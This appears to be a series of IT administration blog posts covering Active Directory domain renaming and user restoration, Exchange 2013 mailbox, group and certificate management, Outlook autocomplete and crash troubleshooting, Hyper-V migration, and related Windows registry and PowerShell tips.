the hard work has already been done by the fabulous people over at: https://blog.thesysadmins.co.uk/admt-series-1-preparing-active-directory.html Rename Domain RENAME DOMAIN -rdp into dc1.olddomain.tld -go to dns tree. -right-click FORWARD-LOOKUP-ZONE. -click NEXT > NEXT > NEXT -type in newdomain.tld -click NEXT > NEXT > FINISH (this is your new domain name) -cd c:\installs -rendom /list -edit c:\installs\Domainlist.xml -replace olddomain.tld with newdomain.tld (in 4 places. The last place doesn't have a .tld) -rendom /prepare -rendom /execute -reboot -netdom computername dc1.olddomain.tld /makeprimary:dc1.newdomain.tld -reboot -gpfixup /olddns:olddomain.tld /newdns:newdomain.tld -gpfixup /oldnb:olddomain /newnb:newdomain -rendom /clean -rendom /end -remove olddomain.tld from dns tree. -final reboot to make sure it survives reboot. -go to DHCP tree. -go to ipv4 > server-options -change dns domain name to newdomain.tld -restart DHCP service -you have have to change each scope > scope-options Client computers will need to be rebooted twice. -once dc is rebooted, wait 15 minutes. -reboot client computers. -wait 15 minutes. -reboot client computers again. Client computers suffix should be changed automatically. If you need a regedit to change the primary dns suffix when membership changes: echo y | reg add   "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v SyncDomainWithMembership /t REG_DWORD /d 00000001 If you have problems with a client pc joining the new domain, you can: -netdom remove oldpc /Domain:olddomain.tld /Force -reboot -join newdomain.tld If you really, really, really need, you can use the USER-PROFILE-WIZARD at https://www.forensit.com/downloads.html NOTES: -these are better instructions than mine: https://mizitechinfo.wordpress.com Hyper-V Migration Hyper-v migration. This is an offline migration (not a live migration). Here's how: On the older HYPER-V host: -shutdown the VM off gracefully. -click ACTION > EXPORT (at the top). This will export the entire VM somewhere. This can be an external drive or a network share. -click ACTION > IMPORT-VIRTUAL-MACHINE -select the folder of the EXPORT (from above). -select REGISTER THE VIRUTAL MACHINE This will leave the VM where it is. -select RESTORE THE VIRTUAL MACHINE. This will place the VM where you tell it to. Delete AD User but Mailbox Doesn't Show Disconnected There is a link between AD and EXCHANGE. But it isn't a hard link. Meaning that just because you create an AD account doesn't mean an Exchange account will be created. Conversely, if you delete an AD account doesn't mean that the EXCHANGE account is deleted. Rather it is DISCONNECTED. It remains this way for 30 days. Then it is deleted. Sometimes if you delete the AD account and the EXCHANGE account doesn't show DISCONNECTED until the MAILBOX-DATABASE runs its regular maintenance. But you can force it to run by: • Get-MailboxDatabase | Get-MailboxStatistics | Format-List DisplayName, MailboxGuid, Database, DisconnectReason, DisconnectDate • Update-StoreMailboxState -Database “db_name” -Identity “mailbox_guid” This is useful if you want to import some AD users into the domain from another domain but they already have EXCHANGE accounts. You can: • -import the other AD accounts. • -show the mailboxes as disconnected. • -reconnect the mailboxes to the other AD accounts. Avago 3108 | LSI | MegaRaid | Broadcom | Supermicro MegaRaid controllers can be confusing and difficult because of the companies that keep on merging together. Currently, Broadcom maintains LSI equipment. But, in my opinion, they are being difficult recently and forcing you to get support through the OEM's. OEM's like Supermicro don't have much information either. In any event, you can control the MegaRaid cards either: -upon boot up with a CTRL+H -or through the MegaRaid Management Software Again, I would list more but this web site has more information than we can provide: Upon installation, the login is the login of the computer you are using. You can now manage your raid. VHDX to Physical Disk I created a VHDX from a physical disk using a program called Disk2vhd. Now I want to copy that VHDX back to a physical disk. • -boot from E2B USB disk • -select: systemrescuecd Get your bearing by seeing what is recognized: • fdisk |grep "/dev/" To connect the VHDX and clone to the physical drive: • -type: qemu-nbd --connect=/dev/nbd0 --format=VHDX <vhdx_file_name> • -type: ddrescue --verbose --force /dev/nbd0 /dev/sda To disconnect the VHDX: • -type: unmount /mnt • -type: qemu-nbd --disconnect /dev/nbd2 Migrating Active Directory Users and Merging Domains Migrating Active Directory Users and Merging Domains Imagine you are part of a company. That company is being bought out by a larger company. To ease feelings, new email accounts are created at the larger company (ie This e-mail address is being protected from spambots. You need JavaScript enabled to view it ). The computers remain on the domain of the smaller company (ie @branch.tld). Now comes a point in time where the larger company wants to join the domains together. What are the options? How do you handle this situation? Very good questions. OPTION-1: 1 Forest & 2 Domains A forest is a group of domains. It is possible to keep the domains separate but still have the same forest. @hq.tld and @branch.tld will live happily together and have a trust-relationship. Two users would still exist. For example, This e-mail address is being protected from spambots. You need JavaScript enabled to view it and This e-mail address is being protected from spambots. You need JavaScript enabled to view it would still exist which is confusing for people. OPTION-2: Parent-Child Domain The parent domain is hq.tld. It is possible to have a child domain such as branch.hq.com (or is you prefer, us.company.tld). Two users would still exist. For example, This e-mail address is being protected from spambots. You need JavaScript enabled to view it and This e-mail address is being protected from spambots. You need JavaScript enabled to view it would still exist which is confusing for people. OPTION-3: Flat & Import This consolidates everything down. It gets rid of messiness and flattens the company to 1 domain of hq.tld. Only one user exist per person and this makes sense for people. How To Flatten Domain and Import Users Outlook 2016 Autocomplete (nk2) When you start an email and you start to type in an email address, OUTLOOK will show a drop-down list of email addresses you've written to before. This is an AUTOCOMPLETE-list (This is not an address-book or contact-list). What's surprising to me is that, to users, this list is more important than the contact-list or address-book. Probably because it automatically show. What's more suprising is that there is no connection between the contact-list, address-book or AUTOCOMPLETE-list. History Autocomplete The AUTOCOMPLETE file used to be called the NK2 file. There is a ton of information about the NK2 file.But it's 2017 and closing to 2018, the NK2 file is no longer relevant. The data on the internet is becoming long in the tooth. So much bad information. Location Autocomplete In any event, the AUTOCOMPLETE list in OUTLOOK 2016 is here: C:\Users\foo.user\AppData\Local\Microsoft\outlook\RoamCache\ The file name is something like: Stream_Autocomplete_0_A603AC42FB764D4C9662D971D85637C2.dat !!!Step 1 For Autocomplete!!! Before you do anything, copy this file as a backup!!! The file size is small and can be copied in less than 5 seconds. This file is known to be volitile and can go from a large size down to zero without warning. This is why you want a backup. Transfer Autocomplete If you have an old computer and OUTLOOK setup and your new comuter and OUTLOOK setup doesn't have the list, you can: • -close OUTLOOK. • -copy this file to the new computer. • -place in the following directory: C:\Users\foo.user\AppData\Local\Microsoft\outlook\RoamCache\ • -rename the current DAT file to something like: Stream_Autocomplete_0_A603AC42FB764D4C9662D971D85637C2.dat.old • -change the wanted DAT file (with all the info in it) name to the current name, something like: Stream_Autocomplete_0_A603AC42FB764D4C9662D971D812345.dat Export Autocomplete You can export the names in the DAT file. Despite the name, the NK2EDIT is the best tool for this: This will save the file as an NK2 file that can later be imported somewhere else. Import Autocomplete This is for a fresh OUTLOOK with no AUTOCOMPLETE. • -open the NK2 from the old system. • -click FILE > EXPORT-TO-MESSAGE-STORE This will overwrite the existing AUTOCOMPLETE with the items from the old AUTOCOMPLETE. Merge Autocomplete This is to merge old AUTOCOMPLETE with the current AUTOCOMPLETE. • -open the NK2 from the old system. • -click FILE > IMPORT-FROM-MESSAGE-STORE • (This will merge the current AUTOCOMPLETE with the info from the older AUTOCOMPLETE.) • -click FILE > EXPORT-TO-MESSAGE-STORE This will overwrite the existing AUTOCOMPLETE with the items from the old AUTOCOMPLETE. Rebuild Autocomplete Let's say that the AUTOCOMPLETE file is gone. For whatever reason, it is emtpy (I'm bashfully looking away, avoiding eye contact). But you still have your PST/OST file. Can't you just rebuild the AUTOCOMPLETE with information that is in the SENT-ITEMS folder? Yes, you can. Here's how: •  -open NK2EDIT (the list will be empty). This will allow you to rebuild the AUTOCOMPLETE with items from your SENT-ITEMS folder. This is probably what you want; as everyone you've written an email to will automatically be placed in here. In addition, you can place a checkmark to items from your INBOX as well. Fiddle around with the settings and when you are satisfied, click FILE > EXPORT-TO-MESSAGE-STORE. Edit the AUTOCOMPLETE • -open NK2EDIT and edit away. • -be sure to FILE > EXPORT-TO-MESSAGE-STORE. Final Thoughts In short, this is an oldy but goody. Considering the importance of AUTOCOMPLETE items to users, you wonder why this isn't built directly into the OUTLOOK. NOTES There is a POWERSHELL script that didn't exactly work for me but it looks promising if could be updated: Outlook 2016 Won't Open - Crashes Upon Starting Outlook 21016 Outlook 2016 Won't Open - Crashes Upon Starting Outlook 21016. Here's how I fixed it: Office365 Repair • -close OUTLOOK • -click START > CONTROL-PANEL > PROGRAMS-AND-FEATURES • -click MICROSOFT-OFFICE-365 • -click CHANGE (at the top). • -click FULL-REPAIR (not "quick-repair") • -wait 15 minutes. • -try OUTLOOK again when finished. x64 Bit If that doesn't work, I've found the x64 bit to be more stable: • -uninstall Microsoft Office x32 • -restart computer. • -install Microsoft Office x64 Outlook Safe Mode If that doesn't work: • -hold CONTROL • -click OUTLOOK icon to open. • -click YES (for disable plugins) • -uncheck everything. • -click OK • -close OUTLOOK • -open OUTLOOK in normal mode. Set Data File If that doesn't work: • -click START > SETTINGS > CONTROL-PANEL > MAIL • -click EMAIL-ACCOUNTS • -click DATA-FILES (at the top) • -select your mail account in the list. • -click SET-AS-DEFAULT • (yes, even if it already is). • -click CLOSE > CLOSE. • -open OUTLOOK. Update iCloud If that doesn't work: Office365 Account Conflict If that doesn't work, you might have an OFFICE365 account conflict. You may have one OFFICE365 account for WORD, EXCEL, OUTLOOK and another OFFICE365 account for EMAIL. • -click START > SETTINGS > ACCOUNT • -click EMAIL-&-APP-ACCOUNTS (on the left-hand side). • -remove the OFFICE365 account that is only for email (leaving the OFFICE365 account that is for WORD, EXCEL, etc or the one that you use to login to the computer [ie same as your username]). • -make sure the correct DATA-FILE is set as the DEFAULT (see above). • -open OUTLOOK Office Update If that doesn't work: • -click START > SETTINGS • -click UPDATE-&-SECURITY • -install any updates and restart the computer. Redo If that doesn't work, you've probably spent too much time on this: • -start a new profile. • -add the email accounts back in. Microsoft Edge Pop Up Blocker Exceptions Microsoft Edge Pop Up Blocker Exceptions As of this writing, there is not pop up blocker exception setting in Microsoft Edge. There is only an ON/OFF option. However, you can still adjust this manually through the registry or regedit. You can manually edit here: [HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\Allow] Pop Up Blocker Exceptions Allow Or you can follow the instructions below: • -click start > run • -type: cmd • -type: echo y | reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\Allow" /v "url-name-here" /t REG_BINARY /d 00000000 (NOTE: keep the quotes in-tact. Use *.domain.tld for wildcard.) Pop Up Blocker Exceptions Allow In Private Also note that PrivateWindows mode has separate values located here (which doesn't mean they are all that private): • -click start > run • -type: cmd • -type: echo y | reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate" /v "url-name-here" /t REG_BINARY /d 00000000 (NOTE: keep the quotes in-tact. Use *.domain.tld for wildcard.) Exchange 2013 - Get the Number of Emails in a Folder Exchange 2013 - Get the Number of Emails in a Folder Here's how: Get-MailboxFolderStatistics foo.user |Select Name, ItemsInFolder It will show the folder structure and the number of items in each folder. Exchange could not load the certificate with thumbprint Exchange could not load the certificate with thumbprint. Or as the warning message states in the logs: Microsoft Exchange could not load the certificate with thumbprint of 59235427B7C322A8CFD7E1EB939445A2EAF9F670 from the personal store on the local computer. Get the information There's a few ways to get the information to see the current certificate list. First is through the Exchange Management Shell (EMS): • -type: get-exchangecertificate You can see the same list in the Exchange Admin Center (EAC): • EAC > servers > certificates You can also see the same list in Internet Information Services (IIS): • -click server-name (on the left-hand side). • -click SERVER-CERTIFICATES (on the middle section). Once you have the information displayed, find the thumbprint of the certificate you are using for email. Fix the error In EMS: • -type: Enable-ExchangeCertificate -Thumbprint <new_certificate_thumbprint> -Services None • -type: Enable-ExchangeCertificate -Thumbprint <new_certificate_thumbprint> -Services IMAP,POP,IIS,SMTP Explanation This error is actually coming from the configuration of the: get-transportservice More specifically, the value at: get-transportservice |select InternalTransportCertificateThumbprint In older versions this is called: get-transportserver More specifically, the value at: get-transportserver |select InternalTransportCertificateThumbprint With this command you will see the thumbprint of the certificate in the log. Typing the commands above will replace this value with the new value. For the curious, there is no fine-tuned fix. In other words, the following does not exist or work. Use the above commands: set-transportservice InternalTransportCertificateThumbprint <new-certificate-thumbprint-here> Find All Distribution Groups A User Is A Member Of Find All Distribution Groups A User Is A Member Of. I hope that makes sense. Let's say you have a user name: foo.user. What groups is foo.user a member of? Here's how: Get-DistributionGroup -Filter "Members -like 'CN=foo user,OU=where-ever,OU=Users,DC=domain-name-here,DC=tld'" Since the DistinguishedName is used, it makes it nearly impossible to use the command unless you keep it in a handy note somewhere. Instead, this may be easier: -type: $distinguishedName = (Get-Mailbox -Identity foo.user).distinguishedname -type:$group = Get-DistributionGroup -Filter "Members -like '$($distinguishedName)'" -type: Write-Host $group Adobe Lightroom High CPU on Mac OSX Another article on the internet about Adobe Lightroom with high cpu on Mac OSX because, well, it's a problem (and Apple doesn't care). • -close Lightroom app. • -delete: /Users/<username>/Library/Preferences/com.adobe.Lightroom6.plist • -delete: /Users/<username>/Library/Preferences/com.adobe.Lightroom6.LSSharedFileList.plist • -delete anything else that looks like it belongs to Lightroom in: /Users/<username>/Library/Preferences/ • -delete anything that looks like it belongs to Lightroom in: /Users/<username>/Library/Preferences/Adobe/ • -delete anything that looks like it belongs to Lightroom in: /Users/<username>/Library/Application Support/Adobe/ • -delete anything that looks like it belongs to Lightroom in: /Users/<username>/Library/Caches/Adobe/ • -open LIGHTROOM • -click LIGHTROOM > PREFERENCES > GENERAL. • -uncheck "Select the current/previous import collection during import." • -click PERFORMANCE (at the top). • -uncheck "Use Graphics Processor." • -make sure the import folder that it is trying to import from exists. In other words, sometimes the last import location is a external drive that doesn't exist anymore. Change it to somewhere neutral like the DESKTOP. Windows 10 Lock Icons Windows 10 Lock Icons. Here's how: • -click here to download the program: http://www.donationcoder.com/Software/Skrommel/index.html#DeskLock • -move the program to: C:\Program Files (x86)\DeskLock • -right-click DeskLock.exe • -click CREATE-SHORTCUT • -move the shortcut to: C:\Users\$username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (where $username is your-username that you use to login to your computer) • -arrange the icons the way you want. • -reboot the computer. Having various clients, it's always interesting to see different perspectives. There is a class of client that approaches computers differently than I do. One question this class asks is, "How do I lock my icons on my DESKTOP?" The thinking is that the DESKTOP is the User Interface (UI). This UI should not be changed unless given specific permission and instructions to do so. Changing it without permission or instruction is nearly a violation of human rights. With as much attention that UI gets (and rightly so), one would think that the DESKTOP arrangement is utmost important rather than being flippantly changed every time a feature update comes along. One Operating System that I know of (Ubuntu) went so far as to lock the UI so that the TASKBAR and START-BUTTON are locked on the left hand side of the screen. And, of course, Mac OSX has always had the TASKBAR and APPLE menu at the top. A person unfamiliar or afraid of computers will not want anything changed. And as we get older, we have the tendency to want everything to stay the same. Don't have 2 buttons if you can have one. Even Mac mouses have only 1 button until told otherwise. Referring to Windows 10 annoying habit of re-arranging icons, as one client put it, "It's like someone coming into your home and rearranging your furniture without asking." I don't disagree. Mimecast Undeliverable - Unknown Address Error Problem Mimecast Undeliverable - Unknown Address Error. You get the message: ===== The following message to < This e-mail address is being protected from spambots. You need JavaScript enabled to view it > was undeliverable. The reason for the problem: 5.1.0 - Unknown address error 550-'Invalid Recipient - https://community.mimecast.com/docs/DOC-1369#550' ===== Further more, looking at the TRACKING diagnostics, you see the "Rejection Information" states, "Failed Known address verification." The issue is that the email address does exist in Exchange. What gives? Solution Well Mimecast has a few settings to receive email. This setting is on the domain/internal-directory level (administration > directories >internal-directories). There are a few options. One is "Accept emails for known recipients only." Accordingly, each user that you want to receive email for must be added to Mimecast. The first time a user sends an email outbound via Mimecast a user will be created. Since groups don't send email (typically), a Mimecast account is never added. So it's possible that there could be an email address in EXCHANGE that is not in Mimecast. Fortunately, users can also be added to Mimecast through: • import (ie import a list) • manually • AD sync If there are not a bunch of groups, it's probably easiest to just add the group email addresses manually. Generating Barcodes - Code 39 and Code 128 Generating barcodes is somewhat easy but can get complicated for various reasons. Before we get to it, know that there are several types of barcode formats. We're focusing on linear barcodes, CODE 39 and CODE 128. Code 39 (or Code 3 of 9) Code 39 is simple. In short, surround the text with asterisks and change the font to 3-OF-9. • -install the Code39 font here: http://www.fonts2u.com/3-of-9-barcode.font ([c] CAIL v1.0 - 1993) • -install the font. • -reboot the computer (this is required). • -in WORD: • type what you want in a barcode (ie ABC123). • surround it with asterisks (ie *ABC123*). • change the font to 3-OF-9. • that should do it! • -in EXCEL • type what you want in a barcode in column A: (ie ABC123) • create a simple formula (use the CONCAT function) in column B that surrounds the text with asterisks: (ie *ABC123*) • create a simple formula in column C that simply mirrors column B. • change the font on column C to font 3-OF-9. • that should do it! • -in FILEMAKER • create a field called INFO as text. • create a field called INFO_BARCODE as calculation. • create a calculation that concats the INFO field surrounded by asterisks ("*" & INFO & "*"). • put the fields on the layout. • on the INFO_BARCODE field, change the font to 3-OF-9. Code 128 Code128 is a little more challenging than Code39. You would want to use Code128 when you need a compact barcode in a small space where Code39 will not fit. The challenging item with Code128 is that you need to translate what you want in a barcode into a barcode-string that contains accent letters. • -install the Code128 font here: http://www.dafont.com/code-128.font ([c] GRANDZABU v1.2 - 2003) • -install the font. • -reboot the computer (this is required). • -go to an online barcode-string-builder, here: http://www.jtbarton.com/Barcodes/BarcodeStringBuilderExample.aspx • -type what you want barcoded. • -click TO CODE 128 • -in WORD: • paste in the results. • change the font to CODE-128. • that should do it! • -in EXCEL: • -in FILEMAKER • download the FILEMAKER plugin here: http://downloads.idautomation.com/IDAutomationFMPlugin.zip • unzip the download. • close FILEMAKER. • copy the plugin file called IDAutomation.fmx and paste it in C:\Program Files\FileMaker\FileMaker Pro\Extensions (adjust the path to your version accordingly). • open FILEMAKER. • create a field called INFO as text. • create a field called INFO_BARCODE as calculation. • create a calculation that returns the INFO field as a barcode string. Use the custom function like so: IDAu_Code128( INFO ) • the result should be calculated as TEXT (not NUMBER). • put the fields on the layout. • click FORMAT > FONTS > CONFIGURE/MORE-FONTS (at the top menu). • find CODE-128 (on the left-hand column). • click MOVE. • click OK. • select the INFO_BARCODE field. • hold CTRL and ALT keys (on your keyboard). • select the font to Code-128 (at the top). • that should do it! NOTES: For whatever reason, I struggled do this for days. Again, I found a bunch of misinformation or confusing documents that lead me astray. Even different/newer versions of the fonts were red herrings and did not produce correct results. With the correct fonts, installed correctly, with the correct plugins, installed correctly, with the correct calculations, calculating correctly and the fonts configured correctly, I was finally able to do this. Exchange 2013 Shared Mailbox Background A mailbox is a typical account. You have John Doe. He has an account. His account is a mailbox account. The account is This e-mail address is being protected from spambots. You need JavaScript enabled to view it . Options John works with others doing proposals. What are the options? 1. pseudonym 2. group-account 3. separate account 4. shared mailbox 5. outside system Option 1 - Pseudonym (What you start out doing) 1-We can setup a pseudonym/fake-account/vanity-account. No matter what you call it, the idea is the same. It is an email address that automatically goes a real account. For example: This e-mail address is being protected from spambots. You need JavaScript enabled to view it automatically goes to the inbox of John Doe. This is great if only one person is responsible. But as the team grows, this becomes cumbersome. Option 2 - Group Account (What you graduate to) 2-We can setup a group-account. This is similar to above but the email goes to more than one person. For example: This e-mail address is being protected from spambots. You need JavaScript enabled to view it automatically goes to the INBOX of John Done and Jane Doe. This is great if it is a small team. The problem becomes, not everyone on the group know if a response was sent. Also folder organization is different for everyone on the group. You want everyone to have the same info, and see the same responses, then see further on. Option 3 - Separate Account (What you shouldn't do) 3-We can setup a separate account. This is a typical account but instead of assigning it to one person, you give the username/password to a group of users. For example: This e-mail address is being protected from spambots. You need JavaScript enabled to view it has its own inbox and several users connect to it through way of username/password. NOTE: While this seems like a good idea, years of experience says that this is a bad, bad, bad idea. Mainly because years on down the line, you can't find out who is responsible for the account. When you check the account it has a bunch of email in the inbox that no one has checked for years. I have witnessed this countless times in many clients. Kindly convince them to do it another way or just agree with them and set it up another way. The end result will be the same as below. Option 4 - Shared Mailbox (What you'll be required to do) 4-We can setup a shared mailbox. A shared mailbox is very similar to a separate account. The difference is that rather than handing out a username/password and letting them connect to it, you assign the account to users and it automatically shows in their folder structure on OUTLOOK as a separate INBOX. This way when five years pass, you can tell who is using the account. Here's how: set-mailbox foo.user -Type Shared Great! You are almost there. Now assign permissions of the people who need to use the shared-mailbox. The people will need both FULL-ACCESS and SEND-AS permissions to control the account and send messages. There is also a SEND-ON-BEHALF option available. NOTE: -the FULL-ACCESS permission is an EXCHANGE permission (add-mailboxpermission/set-mailboxpermission/get-mailboxpermission/remove-mailboxpermission). -the SEND-ON-BEHALF permission is an EXCHANGE key property (set-mailbox foo.user -GrantSendOnBehalfTo/get-mailbox foo.user |select GrantSendOnBehalfTo). -the SEND-AS permission is an AD permission (Add-ADPermission/get-adpermission foo.user -ExtendedRights Send-As -user user1). Here's how to add the FULL-ACCESS and the SEND-AS permissions: Add-MailboxPermission foo.user -User user1 -AccessRights FullAccess -InheritanceType All | Add-ADPermission -Identity "foo user" -User user1 -ExtendedRights "Send As" You may have to fiddle around with the add-adpermission command as it want the AD name like this, "FirstName LastName" (not the DISPLAY-NAME or ALIAS). ANOTHER NOTE: -the command does not accept multiple values for the users. Your options are to create a group & run the command on the group (hint: do not do this), run the command separately for each user wanting access (hint: do this if there's a handful), run the command using a txt file (hint: do this if there's a bunch) or use the EAC/ECP. You are doing great! That should just about do it. Automapping Issues But there's one more item to cover; AUTOMAPPING. AUTOMAPPING automatically shows the shared-mailbox to show in Outlook. This way, users do not have to manually add the account to their OUTLOOK... the shared-account automatically shows. This saves a bunch of hassle trying to get everyone to use a second account and it prevents dreaded OUTLOOK problems. Adding the permissions above will automatically turn AUTOMAPPING on. There should be no further steps. However, what happens if the shared-account doesn't show in OUTLOOK? What then? Well, this seems to be an issue many run into for various reasons. So let's cover some of them. First, there is a way to set the AUTOMAPPING off so that you can add the account manually: Add-MailboxPermission foo.user -User user1 -AccessRights FullAccess -InheritanceType All -automapping$false To check AUTOMAP, you have to use the Get-ADuser command (not an EXCHANGE command): This command will show a list of accounts. If the account is in the list, then AUTOMAPPING is turned on for that account. Second, AUTOMAPPING won't work for Organization-Managment-Administrators. This is because this group already has mailboxperissions set and it automatically includes a DENY (or DENY: True). DENY takes priority over ALLOW. There are ways to get around this but it is outside the scope of this article. Third, AUTOMAPPING doesn't work if DNS is incorrect/not-working-the-way-that-makes-OUTLOOK-happy. For whatever reason, AUTOMAPPING works fine for locations where we have a flat domain structure (everyone is on the same domain). It doesn't work when we have separate domains (ie local computer domain is remotedomain.tld and email domain is emaildomain.tld). Again, troubleshooting this is outside the scope of this article. Fourth, wait. For whatever reason sometimes it takes a few hours to show. Give it 24 hours before sounding the alarm. So putting it all together. See the FULL-ACCESS permissions: get-mailboxpermission foo.user |select user,accessrights,deny,inheritancetype See the SEND-AS permissions: See the AUTOMAPPING value: That's it! Go home. You're done for the day. Outlook Web Access and Shared Mailboxes Outlook Web Access (OWA) will not automatically map shared mailboxes the same way that the OUTLOOK app does.You will have to manually add the shared mailbox. -right-click your name (on the left-hand side). -click on the name that shows. -the account will show on the left-hand side. Sent Items with Shared Mailboxes Sent items automatically go in the SENT folder of the delegate (the person accessing the shared mailbox) and not the shared mailbox. Some people do not like this. So there is a registry edit you can do to put the sent message in the shared mailbox sent folder instead: echo y | reg add "HKCU\Software\Microsoft\Office\[version]\Outlook\Preferences" /v DelegateSentItemsStyle /t REG_DWORD /d 00000001 NOTE: [version] is: OUTLOOK-2010 = 14.0 OUTLOOK-2013 = 15.0 OUTLOOK-2016 = 16.0 NOTE-2: Here's a really good article: http://windowsitpro.com/office-365/using-shared-mailboxes-office-365 Deleted Items with Shared Mailboxes Same applies for the deleted items. Here's the registry edit you can use to put the deleted messages in the shared mailbox deleted folder: echo y | reg add "HKCU\Software\Microsoft\Office\[version]\Outlook\Options\General" /v DelegateWastebasketStyle /t REG_DWORD /d 00000004 Option 5 - Outside System (What you should do. Hint: pick this one!) 5-The other option is to use an outside system. A customer relationship management tool or CRM. Something like Salesforce, HighRise, Zendesk-Inbox, etc (I'm sure there are others). The reason you do this is because the goal of this situation is to work together and consolidate items down to one spot. Teams try to solve this through email because that is what they are used to using as individuals. But teams need to work together. Email is communication. Email is not issue-tracking, customer-tracking, proposal-tracking. Teams "feel" like there's a lot going on but when you look a the actual issues/customers/proposals on hand, there may not be that many. There's a lot of motion but very little movement down field. These systems track the issues/proposals and consolidate all communication down to those issues. Suddenly, 100 emails boil down to 7 issues with a status (such as PENDING or 80%) and an assignment so you can see who (individual or team) is assigned to the issue/proposal. Initially, you can assign issues/leads/proposals and track them, keeping the communication/email with the lead. Eventually, you can capture metrics such as win/loss and view a pipeline of what may be coming in the near future. Here are some tools to consider: Sometimes if you don't need a CRM just a simple solution, Zendesk-Inbox might be a good fit. As of this writing it is in beta. Quick Tip: See Remote Desktop Connections Quick Tip: See Remote Desktop Connections To see remote desktop connections (RDP connections): -type: query user It will show the connection and the idle time. This way if you are sharing a username, you can see if the account has been idle so you can connect without disrupting the other person. HOW WE GOT HERE THEM: I get a "Windows Security" login when I try to setup Outlook. It should just pick up all the settings automatically through autodiscover after I type in the email address and the password. ME: Who cares. Everything is working. Type it in twice and move on with life. THEM: It shouldn't be this way. It wasn't this way at my last place. We just typed in the email address and password and everything automatically worked. ME: Sigh. I'll look into it. OUTLOOK ANYWHERE OPTIONS (RPC over HTTP) Well I'm glad I did look into it. From my other articles, the fine tuning of an MS EXCHANGE system is what makes it powerful as well as difficult. So why is OUTLOOK ANYWHERE involved? Because all versions of OUTLOOK starting with OUTLOOK 2013 communicate through OUTLOOK ANYWHERE configuration (aka RPC over HTTP). In this instance, EXCHANGE can change the way OUTLOOK talks to it. There are three options: • BASIC: username and password is required while attempting communication with Exchange. • NTLM: the current Windows user information on the client computer is supplied through cryptography communication. If the communication fails, a prompt for the username and password is required. In theory, if the computer is joined to the domain, a username and password is not needed. • NEGOTIATE: kinda like the same thing as NTLM except it uses a more updated version. In addition to these options, EXCHANGE can have different setting for outside the office or inside the office. By default, EXCHANGE 2016 uses NEGOTIATE for outside the office and NTLM for inside the office. HOW TO CHANGE OUTLOOK ANYWHERE SETTINGS To see all the current settings: Get-outlookanywhere |fl To see the current settings we are interested in: To set the settings to the default if they have been changed: Set-OutlookAnywhere -identity "rpc (Default Web Site)" -SSLOffloading $true -InternalClientAuthenticationMethod NTLM -ExternalClientAuthenticationMethod Negotiate -IISAuthenticationMethods Basic,NTLM,Negotiate NOTES What's interesting to me is that the builtin documentation claims there are more settings. To see the builtin documentation: help set-outlookanywhere -detailed To see the online documentation: https://technet.microsoft.com/en-us/library/bb123545(v=exchg.150).aspx They list out the settings as the following with no further info on the other options: Basic | Digest | Ntlm | Fba | WindowsIntegrated | LiveIdFba | LiveIdBasic | WSSecurity | Certificate | NegoEx | OAuth | Adfs | Kerberos | Negotiate | LiveIdNegotiate | Misconfigured Managing Exchange 2013 Groups Managing Exchange 2013 Groups Simplified System In a simplified logical system, there are the following: -user: a single individual. -group: more than one user. In addition, groups are universal in the company. A group is a group. There are no group types. A group can access resources and receive email. Windows Server In MS world, there are more options for fine-grain control. There is a security-group to access resources and a distribution-group to receive email. (For the curious, these are the only two types of groups, there are no other types of groups.) Let's begin, shall we. GET-DISTRIBUTIONGROUP To see all the distribution groups: Get-DistributionGroup |select PrimarySMTPAddress To see all the distribution groups that receive email from the outside world: Get-DistributionGroup | ? {$_.RequireSenderAuthenticationEnabled -eq $true} | select PrimarySMTPAddress To see all the distribution groups that receive email only from within the company: Get-DistributionGroup | ? {$_.RequireSenderAuthenticationEnabled -eq $false} | select PrimarySMTPAddress Great! Let's move on to the AD side of the system GET-ADGROUP But before we do, note that typically, using a command and "|fl" will let you see all the info. On get-adgroup command, it doesn't work. You have to use: To see all of the AD group properties: Get-ADGroup -identity "foo-group" -prop * Also note that the get-adgroup command uses the SAMACCOUNTNAME (it does not use the NAME or DISPLAYNAME as other commands). So if you have an ad-group with the name FOO-GROUP-NAME but the SAMACCOUNTNAME is FOO-GROUP-SAMACCOUNTNAME, you have to use the SAMACCOUNTNAME: Get-ADGroup -identity "foo-group-samaccountname" -prop * To see all the groups (both AD and distribution as all distribution groups are AD groups): Get-ADGroup -Filter * -Prop * |select name,samaccountname,mailnickname To see AD security-groups (groups without email addresses): Get-ADGroup -filter {GroupCategory -eq "Security"} |select name,samaccountname To see AD distribution-groups: Get-ADGroup -Filter 'GroupCategory -eq "Distribution"' -prop * |select name,samaccountname,mailnickname ISSUES Theoretically, this list should match the get-distributiongroup list from above. But you might notice that some distribution-groups that do not have email addresses. That's kinda strange. What gives? Sometimes the AD distribution-group does not have the necessary info in the database. Having this info is called mail-enabled. There's even a command just to handle this. To mail-enable a distribution group that needs it: Enable-DistributionGroup -Identity "foo-group" (NOTE: This will even work on security-groups.) Also, there are some items in the get-distributiongroup list from above that are not in the get-adgroup command above. What gives? Well because groups can be mail-enabled, it is possible for a security-group to be mail-enabled as well. To see AD security-groups with mail-enabled: Get-ADGroup -Filter 'GroupCategory -eq "Security"' -prop * |select name,mailnickname Finally as a last question, if both group-types (distribution and security) can be mail-enabled, what's the point of having group types? Good question. There isn't. It is the way the world works. Restore Deleted User in Active Directory Restore Deleted User in Active Directory • -click Start > Right click Command Prompt/PowerShell > Select Run as Administrator • -type: ldp • -press Enter • -click CONNECTION > CONNECT • -type in the server name: foo-dc1 (leave everything as default) • -click OK • -click CONNECTION > BIND • -bullet 'Bind As Currently Logged On User' • -click OK • -click VIEW > TREE • -select DC=domain-name-here,DC=tld(ie DC=daknetworks,DC=com) • -double-click CN=Deleted Objects,DC=domain-name-here,DC=tld (on the left hand side) A list of deleted objects will show on the left hand side and will look like this: CN=Foo User\0ADEL:d8dae83b-348c-4b48-af63-6ef9eb88b8e3,CN=Deleted Objects,DC=daknetworks,DC=com • -find the deleted user that was deleted. • -double-click on the user. • (the details of the user will show on the right-hand side) • -right-click on the user 